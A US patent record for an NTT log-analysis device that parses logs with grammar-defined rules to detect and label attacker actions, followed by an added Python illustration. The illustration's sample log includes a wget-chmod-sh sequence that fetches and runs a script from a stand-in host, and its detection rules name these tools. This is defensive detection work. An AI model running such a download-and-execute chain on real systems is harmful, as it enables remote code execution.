US 11,907,365 B2
Information processing device and information processing program
Nariyoshi Chida, Musashino (JP); Yo Kanemoto, Musashino (JP); and Kazufumi Aoki, Musashino (JP)
Assigned to NIPPON TELEGRAPH AND TELEPHONE CORPORATION, Tokyo (JP)
Appl. No. 17/283,552
Filed by NIPPON TELEGRAPH AND TELEPHONE CORPORATION, Tokyo (JP)
PCT Filed May 20, 2019, PCT No. PCT/JP2019/019976
§ 371(c)(1), (2) Date Apr. 8, 2021,
PCT Pub. No. WO2020/075333, PCT Pub. Date Apr. 16, 2020.
Claims priority of application No. 2018-192048 (JP), filed on Oct. 10, 2018.
Prior Publication US 2021/0390178 A1, Dec. 16, 2021
Int. Cl. G06F 21/55 (2013.01); G06F 40/205 (2020.01); H04L 9/40 (2022.01)
CPC G06F 21/55 (2013.01) [G06F 40/205 (2020.01); H04L 63/1416 (2013.01); H04L 63/1425 (2013.01); G06F 2221/034 (2013.01)]
4 Claims
1. An information processing device comprising:
a memory; and
a processor coupled to the memory and programmed to execute a process comprising:
extracting elements relating to actions of an attacker from each input log;
generating a parser based on definition information that defines the actions of the attacker in a formal grammar, the parser being configured to detect, from a log, a log string having a feature corresponding to an action defined by the definition information;
detecting, from a log consisting of the elements extracted by the extracting, log strings having features corresponding to the actions defined by the definition information by using the parser; and
reconstructing the log strings detected by the detecting, adding a label indicating an action defined by the definition information to each of the reconstructed log strings, and outputting the labeled log strings as a log corresponding to a series of actions of the attacker.
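
The four steps of claim 1 (extract, generate parser, detect, reconstruct and label) can be sketched as follows. This is an added example, not code from the patent or from the assignee. The log format, the `label <- terms` definition syntax, the action labels and all function names are assumptions made for illustration, and the rules are compiled to regular expressions as a simplification of the formal grammar the claim refers to.

```python
import re

# Constructed sample log (not from the patent): shell commands mixed with noise.
LOG = [
    '10:00:01 sshd[811]: Accepted password for root from 192.0.2.7',
    '10:00:05 shell[812]: cmd="uname -a"',
    '10:00:06 shell[812]: cmd="id"',
    '10:00:09 cron[77]: job started',
    '10:00:10 shell[812]: cmd="ls"',
    '10:00:12 shell[812]: cmd="wget http://example.invalid/x.sh"',
    '10:00:13 shell[812]: cmd="chmod +x x.sh"',
    '10:00:14 shell[812]: cmd="sh x.sh"',
]
# Hypothetical definition information: label <- sequence of terms; a term is a
# verb or a (a|b) alternation, "+" means one or more. Trusted input only.
DEFINITIONS = """
recon            <- (uname|id|whoami)+
download_execute <- (wget|curl) chmod (sh|bash)
"""

def extract(lines):
    """Step 1: keep only attacker-action elements as (line index, command verb)."""
    hits = ((i, re.search(r'cmd="([\w./-]+)', line)) for i, line in enumerate(lines))
    return [(i, m.group(1)) for i, m in hits if m]

def generate_parser(definitions):
    """Step 2: compile each rule into a regex over a space-terminated verb stream."""
    rules = []
    for row in filter(None, map(str.strip, definitions.splitlines())):
        label, body = row.split("<-")
        rx = "".join(f"(?:{t.rstrip('+')} ){'+' * t.endswith('+')}" for t in body.split())
        rules.append((label.strip(), re.compile(rx)))
    return rules

def detect_and_label(lines, definitions=DEFINITIONS):
    """Steps 3 and 4: detect matching element runs, return (label, original lines)."""
    elements, rules = extract(lines), generate_parser(definitions)
    found, pos = [], 0
    while pos < len(elements):
        stream = "".join(verb + " " for _, verb in elements[pos:])
        hit = next(((label, m) for label, rx in rules if (m := rx.match(stream))), None)
        n = hit[1].group().count(" ") if hit else 1  # elements consumed
        if hit:  # reconstruct the original lines and attach the action label
            found.append((hit[0], [lines[i] for i, _ in elements[pos:pos + n]]))
        pos += n
    return found
```

Calling `detect_and_label(LOG)` returns the labeled runs in log order; elements that match no rule, such as the `ls` command, are skipped rather than labeled.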